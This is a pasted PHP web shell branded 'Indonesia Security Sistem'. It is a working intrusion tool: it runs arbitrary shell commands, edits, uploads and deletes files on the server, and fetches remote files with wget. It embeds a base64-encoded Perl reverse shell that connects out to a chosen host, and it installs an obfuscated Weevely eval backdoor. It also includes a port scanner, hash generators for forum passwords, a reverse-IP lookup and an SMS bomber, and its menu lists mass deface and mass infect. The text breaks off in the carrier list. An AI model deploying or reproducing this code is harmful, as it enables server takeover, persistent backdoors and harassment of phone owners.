· 9 years ago · Jan 11, 2017, 02:16 PM
1<html>
2<LINK rel="SHORTCUT ICON"href="http://orig05.deviantart.net/3958/f/2012/331/e/4/panda_logo_by_kireyanna-d5mcdf4.jpg">
3<body>
4<?php
5
6
7 $head = '
8<html>
9<head>
10</script>
11<title>Indonesia Security Sistem</title>
12<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
13
14<STYLE>
15body {
16 background-image: url(http://img03.deviantart.net/efc3/i/2010/112/4/5/tare_panda_by_pixel_sage.png);
17 background-repeat: repeat-x repeat-y;
18 background-position: left top;
19 font-size: 14px;
20 background-attachment: fixed;
21font-family: sans;
22color: red;
23margin:0px 0px 0px 0px;
24}
25font-family: Courier New
26}
27tr {
28BORDER: line 1px #333;
29color: #FFF;
30}
31td {
32BORDER: line 1px #333;
33color: #FFF;
34}
35.table1 {
36BORDER: 0px;
37BACKGROUND-COLOR: #0ee5bc;
38color: #FFF;
39}
40.td1 {
41BORDER: 0px;
42BORDER-COLOR: #333333;
43font: 7pt Verdana;
44color: Black;
45}
46.tr1 {
47BORDER: 0px;
48BORDER-COLOR: #333333;
49color: #FFF;
50}
51table {
52BORDER: line 1px #333;
53BORDER-COLOR: #333333;
54BACKGROUND-COLOR: 0ee5bc;
55color: #FFF;
56}
57input {
58border : line 1px;
59border-color : #333;
60BACKGROUND-COLOR: #111111;
61font: 9pt Verdana;
62color: Red;
63}
64select {
65BORDER-RIGHT: Black 1px solid;
66BORDER-TOP: #DF0000 1px solid;
67BORDER-LEFT: #DF0000 1px solid;
68BORDER-BOTTOM: Black 1px solid;
69BORDER-color: #FFF;
70BACKGROUND-COLOR: #111111;
71font: 8pt Verdana;
72color: Red;
73}
74submit {
75BORDER: buttonhighlight 2px outset;
76BACKGROUND-COLOR: #18BC9C;
77width: 30%;
78color: #FFF;
79}
80textarea {
81border : line 1px #333;
82BACKGROUND-COLOR: #18BC9C;
83font: Fixedsys bold;
84color: #999;
85}
86BODY {
87 SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
88margin: 1px;
89color: Red;
90background-color: #18BC9C;
91}
92.main {
93margin : -287px 0px 0px -490px;
94BORDER: line 1px #333;
95BORDER-COLOR: #333333;
96}
97.tt {
98background-color: transparent;
99}
100
101A:link {
102 COLOR: White; TEXT-DECORATION: none
103}
104A:visited {
105 COLOR: White; TEXT-DECORATION: none
106}
107A:hover {
108 color: Red; TEXT-DECORATION: none
109}
110A:active {
111 color: Red; TEXT-DECORATION: none
112}
113</STYLE>
114<script language=\'javascript\'>
115function hide_div(id)
116{
117 document.getElementById(id).style.display = \'none\';
118 document.cookie=id+\'=0;\';
119}
120function show_div(id)
121{
122 document.getElementById(id).style.display = \'block\';
123 document.cookie=id+\'=1;\';
124}
125function change_divst(id)
126{
127 if (document.getElementById(id).style.display == \'none\')
128 show_div(id);
129 else
130 hide_div(id);
131}
132</script>'; ?>
133<?php
134error_reporting(0);
135#chdir('');
136//Some basic var's
137if (!@$_GET['path']) {
138 $dir = CleanDir(getcwd());
139} else {
140 $dir = CleanDir($_GET['path']);
141}
142$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
143$domain = $_SERVER['HTTP_HOST'];
144$script = $_SERVER['SCRIPT_NAME'];
145$full_url = $_SERVER['REQUEST_URI'];
146$script2 = basename($script);
147$serverip = $_SERVER['SERVER_ADDR'];
148$userip = $_SERVER['REMOTE_ADDR'];
149$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
150$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
151$disabled = ini_get('disable_functions');
152//Perl back connect script by LorD
153//Encoded in base64 for convenience
154$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
155@ini_set("memory_limit", "9999M");
156@ini_set("max_execution_time", "0");
157@ini_set("upload_max_filesize", "9999m");
158@ini_set("magic_quotes_gpc", "0");
159@set_magic_quotes_runtime(0);
160set_time_limit(0);
161if (empty($disabled)) {
162 $disabled = "None";
163}
164//Some functions
165function CleanDir($directory) {
166 $directory = str_replace("\\", "/", $directory);
167 $directory = str_replace("//", "/", $directory);
168 return $directory;
169}
170function success($for, $var1) {
171 $domain = $_SERVER['HTTP_HOST'];
172 $script = $_SERVER['SCRIPT_NAME'];
173 $full_url = $_SERVER['REQUEST_URI'];
174 if ($for == "filesave") {
175 $message = "File Saved!";
176 $redirect = "http://$domain$script?path=$var1";
177 }
178 if ($for == "filedelete") {
179 $message = "File Deleted!";
180 $redirect = "http://$domain$script?path=$var1";
181 }
182 if ($for == "createdir") {
183 $message = "Directory Created!";
184 $redirect = "http://$domain$script?path=$var1";
185 }
186 if ($for == "dir_exists") {
187 $message = "Directory Already Exists!";
188 $redirect = "http://$domain$script?path=$var1";
189 }
190 if ($for == "file_exists") {
191 $message = "File Already Exists!";
192 $redirect = "http://$domain$script?editfile=$var1";
193 }
194 if ($for == "file_created") {
195 $message = "File Created!";
196 $redirect = "http://$domain$script?editfile=$var1";
197 }
198 if ($for == "file_uploaded") {
199 $message = "File Uploaded!";
200 $redirect = "http://$domain$full_url";
201 }
202 if ($for == "shell_killed") {
203 $message = "Shell Killed!";
204 $redirect = "http://$domain$script";
205 }
206 if ($for == "dir_del") {
207 $message = "Directory Deleted!";
208 $redirect = "http://$domain$script?path=$var1";
209 }
210 if ($for == "dir_renamed") {
211 $message = "Directory Renamed!";
212 $redirect = "http://$domain$script?path=$var1";
213 }
214 if ($for == "file_renamed") {
215 $message = "File Renamed!";
216 $redirect = "http://$domain$script?path=$var1";
217 }
218 if ($for == "configs_found") {
219 $message = "$var1 Configs Found!";
220 $redirect = "";
221 }
222 if ($for == "unzip") {
223 $message = "Successfully Unzipped File!";
224 $redirect = "http://$domain$script?path=$var1";
225 }
226 if ($for == "files_found") {
227 $message = "$var1 files found!";
228 $redirect = "";
229 }
230 if ($for == "weevely") {
231 $message = "Weevely BackDoor Installed!";
232 $redirect = "";
233 }
234 echo "<div id='xbox'><embed
235 src='http://p0wersurge.com/js/achievementnopic.swf'
236 width='300'
237 height='80'
238 flashvars='Text=$message&gs=1337'
239 wmode='transparent'/></div>";
240 if (empty($redirect)) {
241 echo "<script>
242function remove (){
243 document.getElementById('xbox').innerHTML='';
244}
245setInterval(function(){remove();}, 2700);
246</script>";
247 } else {
248 echo "<script>
249function remove (){
250 window.location = '$redirect'
251}
252setInterval(function(){remove();}, 2500);
253</script>";
254 }
255}
256function error($mesg) {
257 $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
258 echo "$error";
259}
260function ByteConversion($bytes, $precision = 2) {
261 $kilobyte = 1024;
262 $megabyte = $kilobyte * 1024;
263 $gigabyte = $megabyte * 1024;
264 $terabyte = $gigabyte * 1024;
265 if (($bytes >= 0) && ($bytes < $kilobyte)) {
266 return $bytes . ' B';
267 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
268 return round($bytes / $kilobyte, $precision) . ' KB';
269 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
270 return round($bytes / $megabyte, $precision) . ' MB';
271 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
272 return round($bytes / $gigabyte, $precision) . ' GB';
273 } elseif ($bytes >= $terabyte) {
274 return round($bytes / $terabyte, $precision) . ' TB';
275 } else {
276 return $bytes . ' B';
277 }
278}
279//Mass File Function
280function files($mass_dir) {
281 if ($dh = opendir($mass_dir)) {
282 $files = array();
283 $inner_files = array();
284 while ($file = readdir($dh)) {
285 if ($file != "." && $file != ".." && $file[0] != '.') {
286 if (is_dir($mass_dir . "/" . $file)) {
287 $inner_files = files("$mass_dir/$file");
288 if (is_array($inner_files)) $files = array_merge($files, $inner_files);
289 } else {
290 array_push($files, "$mass_dir/$file");
291 }
292 }
293 }
294 closedir($dh);
295 return $files;
296 }
297}
298//Upload File
299if (isset($_POST['do_upload_file'])) {
300 $udir = $_POST['upload_location'];
301 $uname = $_FILES['upload_file']['name'];
302 $both = "$udir$uname";
303 if (file_exists($both)) {
304 success("file_exists", $both);
305 } else {
306 switch ($_FILES['upload_file']['error']) {
307 case 0:
308 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
309 success("file_uploaded");
310 } else {
311 error("Failed To Upload File!");
312 }
313 }
314 }
315}
316//wget file
317if (isset($_POST['do_wget_file'])) {
318 $wget_file = $_POST['wget_file'];
319 $wecmd = "wget $wget_file";
320 $wget_ecmd = cmd2($wecmd, $dir);
321 echo "<center><font color='#14ab00'>
322Result:<br>
323<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
324$wget_ecmd
325</textarea></font></center><br><br>";
326}
327//Execute command
328function cmd2($cmd, $path) {
329 chdir($path);
330 $disabled = ini_get('disable_functions');
331 if (empty($disabled)) {
332 $disabled = "None";
333 }
334 if ($disabled == "None") {
335 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
336 while (!feof($io[1])) {
337 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
338 }
339 while (!feof($io[2])) {
340 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
341 }
342 fclose($io[1]);
343 fclose($io[2]);
344 proc_close($execute);
345 return $res;
346 } elseif (function_exists("proc_open")) {
347 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
348 while (!feof($io[1])) {
349 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
350 }
351 while (!feof($io[2])) {
352 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
353 }
354 fclose($io[1]);
355 fclose($io[2]);
356 proc_close($execute);
357 return $res;
358 } elseif (function_exists("exec")) {
359 $res = exec($cmd);
360 return $res;
361 } elseif (function_exists("system")) {
362 $res = system($cmd);
363 return $res;
364 } elseif (function_exists("shell_exec")) {
365 $res = shell_exec($cmd);
366 return $res;
367 } elseif (function_exists("passthru")) {
368 $res = passthru($cmd);
369 return $res;
370 } else {
371 error("The necessary functions to execute commands are disabled!");
372 }
373}
374//Unzip function
375function unzip($filename, $directory) {
376 $zip = new ZipArchive;
377 $res = $zip->open($filename);
378 if ($res === TRUE) {
379 $zip->extractTo($directory);
380 $zip->close();
381 success("unzip", $directory);
382 } else {
383 cmd2("unzip $filename", $directory);
384 }
385}
386//Get files and directories and throw them into an array.
387$open = opendir($dir);
388$files = array();
389$direcs = array();
390while ($file = readdir($open)) {
391 if ($file != "." && $file != "..") {
392 if (is_dir("$dir/$file")) {
393 array_push($direcs, $file);
394 } else {
395 array_push($files, $file);
396 }
397 }
398}
399asort($direcs);
400asort($files);
401?>
402<html>
403<head>
404<?php
405 echo $head ;
406 echo '
407
408<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
409
410
411
412
413 <td width="100%" align=center valign="top" rowspan="1">
414 <font color=red size=8 face="Wallpoet"><b>Indonesia</font><font color=white size=8 face="Wallpoet"><b> Security</font><font color=black size=8 face="Wallpoet"><b> System</font> <div class="hedr">
415
416 <td height="10" align="left" class="td1"></td></tr><tr><td
417 width="100%" align="center" valign="top" rowspan="1"><font
418 color="red" face="comic sans ms"size="3"><b>
419 <font color=#403f3f>
420
421
422
423 More Skill. Less Judgement
424
425 </table>
426
427
428
429';
430
431?>
432<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>There Is No Perfect System In This World </font><br></td></tr></table>
433</head>
434<p></p>
435<p></p>
436<body bgcolor="black"><body bgcolor="black">
437<table border=1 width=100%><td width=15% align=right><font color=red size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname() ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
438</table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
439</table>
440<center><div id="menu">
441<a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=black> [Home] </font></a>
442<a href="<?php echo '?perlbackconnect';?>"><font size=4 face="Wallpoet" color=black> [Perl Back Connect] </font></a>
443<a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=black> [Python Back connect] </font></a>
444<a href="<?php echo '?encrypt';?>"><font size=4 face="Wallpoet" color=black> [Encrypt] </font></a>
445<a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=black> [Mass Deface] </font></a>
446<a href="<?php echo '?massinfect';?>"><font size=4 face="Wallpoet" color=black> [Mass File Infect] </font></a>
447<a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=black> [Install MSD] </font></a>
448<p></p>
449<a href="<?php echo '?sms';?>"><font size=4 face="Wallpoet" color=black> [SMS Bomber] </font></a>
450<a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=black> [Reverse IP] </font></a>
451<a href="<?php echo '?weev';?>"><font size=4 face="Wallpoet" color=black> [Weevely Backdoor] </font></a>
452<a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=black> [Port Scan] </font></a>
453<a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=black> [Zone-H] </font></a>
454</div></center>
455<p></p>
456<p></p>
457<p></p>
458<?php
459if (isset($_GET['encrypt'])) {
460 echo "<form action='' method='post'>
461<center><font color='#14ab00'>
462<input type='text' name='en_string' class='text'>
463<input type='submit' name='do_encrypt' value='Encrypt String'>
464</form>
465</font></center>";
466}
467if (isset($_POST['do_encrypt'])) {
468 $vbsalt = gen_salt("30");
469 $vbsalt2 = gen_salt("3");
470 $mybbsalt = gen_salt("8");
471 $ipbsalt = gen_salt("5");
472 $joomlasalt = gen_salt("32");
473 $password = $_POST['en_string'];
474 $md5 = md5($password);
475 $md52 = md5(md5($password));
476 $md53 = md5(md5(md5($password)));
477 $sha1 = sha1($password);
478 $sha256 = hash('sha256', $password);
479 $vbalg = md5(md5($password) . $vbsalt);
480 $vbalg2 = md5(md5($password) . $vbsalt2);
481 $mybbalg = md5(md5($mybbsalt) . $password);
482 $ipbalg = md5(md5($ipbsalt) . md5($password));
483 $joomlaalg = md5($password . $joomlasalt);
484 $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
485 echo "<center>
486<textarea rows='20' cols='150' style='color:#00ff00'>
487$en_result
488</textarea>
489</center><br>";
490}
491?>
492<?php
493//Port scan
494if (isset($_GET['scan'])) {
495 echo "<center><font color='#14ab00' size='3'>
496Port Scan:<br>
497<form action='' method='post'>
498Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
499Start port: <input type='text' name='start_port' class='text' size='6'>
500End port: <input type='text' name='end_port' class='text' size='7'><br>
501<input type='submit' name='start_scan' value='Scan'>
502</form>
503</font>
504</center>";
505}
506if (isset($_POST['start_scan'])) {
507 $scanhost = $_POST['scan_host'];
508 $startport = $_POST['start_port'];
509 $endport = $_POST['end_port'];
510 while ($startport <= $endport) {
511 if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
512 echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
513 } else {
514 echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
515 }
516 $startport++;
517 }
518}
519?>
520<?php
521//Edit file stuff
522if (!empty($_GET['editfile'])) {
523 $edfile = $_GET['editfile'];
524 $redirectloc = dirname($edfile);
525 echo "<form method='POST'><center>";
526 if (file_exists($edfile)) {
527 if (get_magic_quotes_gpc()) {
528 $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
529 } else {
530 $file_content = htmlspecialchars(file_get_contents($edfile));
531 }
532 if (is_writeable($edfile)) {
533 echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
534<br><br>
535 <input type='submit' name='savedit' value='Save' />
536 <input type='submit' name='deletefile' value='Delete' />
537 </form></center>";
538 if (isset($_POST['savedit'])) {
539 if (get_magic_quotes_gpc()) {
540 $edfilecontent = stripslashes($_POST['edfile_contents']);
541 } else {
542 $edfilecontent = $_POST['edfile_contents'];
543 }
544 if (file_put_contents($edfile, $edfilecontent)) {
545 success("filesave", rtrim($redirectloc, "/"));
546 } else {
547 error("Failed to save file!");
548 }
549 } else if (isset($_POST['deletefile'])) {
550 if (unlink($edfile)) {
551 success("filedelete", rtrim($redirectloc, '/'));
552 } else {
553 error("Failed to delete file!");
554 }
555 }
556 } else {
557 echo "<font color='red'><b>File is read only!</b></font><br>
558<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
559 }
560 echo "</center>";
561 } else {
562 echo "<form method='POST'><center>";
563 echo "<font color='red'><b>File does not exist!</b></font><br>
564<textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
565</textarea><br><br>
566 <input type='submit' name='savefile' value='Create File' /><br /><br />
567 </form></center>";
568 if (isset($_POST['savefile'])) {
569 if (get_magic_quotes_gpc()) {
570 $newfilecontent = stripslashes($_POST['newfile_contents']);
571 } else {
572 $newfilecontent = $_POST['newfile_contents'];
573 }
574 if (file_put_contents($edfile, $newfilecontent)) {
575 success("filesave", rtrim($redirectloc, "/"));
576 } else {
577 error("Failed to save file!");
578 }
579 }
580 }
581}
582?>
583<?php
584//Weevely backdoor
585if (isset($_GET['weev'])) {
586 echo "<center><font color='#14ab00' size='3'>
587<form action='' method='post'>
588Directory to install weevely backdoor:<br>
589<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
590Name of file (something .php):<br>
591<input type='text' name='weev_name' class='text' value='weevely.php'><br>
592Password (more than 3 characters):<br>
593<input type='text' name='weev_pass' class='text'><br>
594<input type='submit' name='install_weev' value='BackDoor'><br>
595</font>
596</center>";
597}
598if (isset($_POST['install_weev'])) {
599 $weevdir = rtrim($_POST['weev_dir'], '/');;
600 $weevname = $_POST['weev_name'];
601 $weevpassword = $_POST['weev_pass'];
602 if (strlen($weevpassword) < 3) {
603 error("Password must be longer than 3 characters!");
604 } else {
605 $first2 = $weevpassword[0] . $weevpassword[1];
606 $rest = substr($weevpassword, 2);
607 $money = "$";
608 $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
609 $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
610 $weevelybd3 = "$money" . "k='$rest';";
611 $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
612 $all = "<?php\neval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));\n?>";
613 if (file_put_contents($weevdir . '/' . $weevname, $all)) {
614 echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
615 success("weevely");
616 } else {
617 error("Failed to write backdoor to $weevdir");
618 }
619 }
620}
621?>
622<?php
623//Domain information
624//Get domains hosted on server from yougetsignal.com
625if (isset($_GET['domaininfo'])) {
626 echo "<font color='#14ab00' size='3'>";
627 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
628 $num = 0;
629 $count = sizeof($dns_record);
630 echo "<br></b><br>";
631 while ($num < $count) {
632 $name_servers = $dns_record[$num];
633 $name_servers2 = $name_servers['type'];
634 $name_servers3 = @$name_servers['target'];
635 $num++;
636 if ($name_servers2 == "NS") {
637 echo "$name_servers3<br>";
638 $nshost = @$name_servers['host'];
639 }
640 if ($name_servers2 == "SOA") {
641 $nsemail = $name_servers['rname'];
642 }
643 if ($name_servers2 == "A") {
644 $nsip = $name_servers['ip'];
645 }
646 }
647 $num = 0;
648 echo "<br><table class='noborder'>
649</table><br>";
650 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
651 $status = $domains_on_server->status;
652 $message = $domains_on_server->message;
653 $domainAr = $domains_on_server->domainArray;
654 $num_of_site = $domains_on_server->domainCount;
655 $count = sizeof($domainAr);
656 if ($status == "Success") {
657 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
658 while ($num < $count) {
659 $hossites = $domainAr[$num];
660 $num++;
661 $hossites3 = $domainAr[$num];
662 $hossites3 = $hossites3[0];
663 $hossites = $hossites[0];
664 $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
665 $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
666 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
667 $num++;
668 }
669 echo "</table><br>";
670 $num = 0;
671 } else {
672 error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
673 }
674 echo "</font><br>";
675}
676?>
677<?php
678//SMS Bomber stuff
679if (isset($_POST['do_bomb_sms'])) {
680 $phonenum = $_POST['phnumber'];
681 $carrier = $_POST['carrier'];
682 $amount = $_POST['numberof'];
683 $from = $_POST['from'];
684 $headers = "From: $from\r\n";
685 $headers.= 'MIME-Version: 1.0' . "\n";
686 $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
687 $subject = $_POST['subject'];
688 $to = "$phonenum$carrier";
689 $numsent = 0;
690 $sent_fail = 0;
691 $sent_success = 0;
692 $msgcontent = $_POST['message_content'];
693 if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
694 error("All Fields Must Entered!");
695 } else {
696 while ($numsent < $amount) {
697 if (!@mail($to, $subject, $msgcontent, $headers)) {
698 $numsent++;
699 $sent_fail++;
700 } else {
701 $numsent++;
702 $sent_success++;
703 }
704 }
705 echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
706Failed to send $sent_fail messages.<br>";
707 }
708}
709if (isset($_GET['sms'])) {
710 echo "<font color='#14ab00'>
711<table class='noborder'>
712<tr>
713<form action='' method='post'>
714<td>Phone Number With Area Code</td>
715<td><input type='text' name='phnumber' class='text'></td>
716</tr>
717<tr>
718<td>Carrier:</td>
719<td>
720<select name='carrier'>
721<option value='@sms.3rivers.net'>3 River Wireless</option>
722<option value='@paging.acswireless.com'>ACS Wireless</option>
723<option value='@advantagepaging.com'>Advantage Communications</option>
724<option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
725<option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
726<option value='@airtouch.net'>Airtouch Pagers</option>
727<option value='@airtouchpaging.com'>Airtouch Pagers</option>
728<option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
729<option value='@myairmail.com'>Airtouch Pagers</option>
730<option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
731<option value='@message.alltel.com'>Alltel</option>
732<option value='@alphanow.net'>AlphaNow</option>
733<option value='@page.americanmessaging.net'>American Messaging</option>
734<option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
735<option value='@paging.acswireless.com'>Ameritech Paging</option>
736<option value='@pageapi.com'>Ameritech Paging</option>
737<option value='@airtelap.com'>Andhra Pradesh Airtel</option>
738<option value='@text.aql.com'>Aql</option>
